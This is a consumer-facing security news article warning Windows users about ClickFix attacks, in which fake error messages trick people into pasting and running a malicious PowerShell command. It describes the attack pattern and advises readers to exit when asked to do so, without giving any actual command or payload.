Do Not Click—If You See This On Your PC It’s An Attack
This message is dangerous.
There’s a new type of attack targeting Windows PCs. Such is its power and increasing popularity, that a new report warns it’s even being picked up by nation state hackers in Russia, Iran and North Korea. But while those threat groups experiment the technique, its main use is still with the cyber criminals targeting your PC, your passwords and your money. Here’s what you need to look out for — and what you need to do.
As warnings go, this one will be straightforward. Once you know the basis of this attack, you should be safe. It’s not complicated and it’s not easily forgotten. We’re talking ClickFix, which ProofPoint says has become increasingly popular “in cybercrime over the last year as well as in espionage campaigns in recent months, suggesting the technique will likely become more widely tested or adopted by state-sponsored actors.”
Samsung Confirms Password Security Warning For All Galaxy Users
ClickFix was first seen last year, and works by using social engineering lures and fake error messages to trick users into copying, pasting and then running a malicious command in the PowerShell terminal on their PC. This then executes the attack. The command will access and then run a remote command which will ultimately install malware on the PC. The rest will be down to the objectives of the attack.
McAfee explains that ClickFix is “a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.”
ClickFix attack
If you click, you’ll end up with a RAT or infostealer like Lumma Stealer or DarkGate on your PC. While early ClickFix lures focused on errors and scareware, it also now tricks users into registering PCs to open secure documents or websites. Whatever the lure, the underlying attack is the same. And it all looks the same — so once you know, you know.
As for those state hackers, “multiple examples of state-sponsored actors using ClickFix have shown not only the technique’s popularity among state actors, but also its use by various countries within weeks of one another.” ProofPoint says “in most cases, the groups returned to standard campaigns after their ClickFix campaigns.” Most people reading this will (luckily) not be targeted by Russian, Iranian or North Korean state actors, but they will be targeted by cybercriminals.
ClickFix attack
Each ClickFix attack has four components, which will be set out as user instructions. There are variations in wording and presentation, but it’s all essentially the same:
- Copy the script
- Open the terminal to run the script
- Paste the copied text
- Execute by pressing “enter” or clicking “ok”
Do Not Make Calls On Your Phone If You Get This Message
And without wishing to oversimplify this, that’s what you look out for. If any error message, PC registration, secure document login or anything else you can think of asks you to carry out those steps, it’s an attack and you need to exit the app or website or message, and likely reboot your PC for good measure.
As McAfee warns, “once the malware is active on the system, it begins its malicious activities, including stealing users’ personal data and sending it to its command and control (C2) server. The script execution often includes steps to evade detection and maintain persistence, such as clearing clipboard contents and running processes in minimized windows. By disguising error messages and providing seemingly helpful instructions, attackers manipulate users into unknowingly executing harmful scripts that download and run various kinds of malware.”